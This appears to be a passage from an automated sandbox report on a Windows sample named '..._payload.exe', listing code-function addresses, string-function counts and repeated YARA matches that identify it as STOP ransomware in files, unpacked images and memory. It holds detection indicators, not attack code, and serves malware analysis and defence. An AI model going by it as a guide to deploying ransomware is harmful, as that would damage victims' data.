                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E284C04_2_00E284C0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E254474_2_00E25447
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E254574_2_00E25457
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E6B5B14_2_00E6B5B1
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E695064_2_00E69506
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E296864_2_00E29686
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E3E6904_2_00E3E690
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2A6604_2_00E2A660
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E6D7A14_2_00E6D7A1
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E287804_2_00E28780
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E267404_2_00E26740
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E227504_2_00E22750
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2F7304_2_00E2F730
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2A7104_2_00E2A710
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E268804_2_00E26880
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E4C8044_2_00E4C804
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E269F34_2_00E269F3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E6D9DC4_2_00E6D9DC
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00EA19204_2_00EA1920
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E69A714_2_00E69A71
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E22B804_2_00E22B80
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E26B804_2_00E26B80
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E63B404_2_00E63B40
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E6ACFF4_2_00E6ACFF
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E29CF94_2_00E29CF9
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E29DFA4_2_00E29DFA
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2BDC04_2_00E2BDC0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E47D6C4_2_00E47D6C
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E2DD404_2_00E2DD40
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E26EE04_2_00E26EE0
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E4CE514_2_00E4CE51
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E69FE34_2_00E69FE3
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E29F764_2_00E29F76
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 4_2_00E40F304_2_00E40F30
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004C47A0 appears 64 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004C4E50 appears 62 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00498C81 appears 74 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004C0870 appears 52 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004BF23E appears 108 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00498520 appears 136 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00490EC2 appears 40 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 0049F7C0 appears 129 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004B1A25 appears 44 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00492587 appears 48 times
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 004BF26C appears 41 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E48520 appears 136 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E6F23E appears 108 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E747A0 appears 64 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E40EC2 appears 40 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E74E50 appears 62 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E48C81 appears 74 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E70870 appears 52 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E42587 appears 48 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E6F26C appears 41 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E61A25 appears 44 times
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: String function: 00E4F7C0 appears 129 times
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
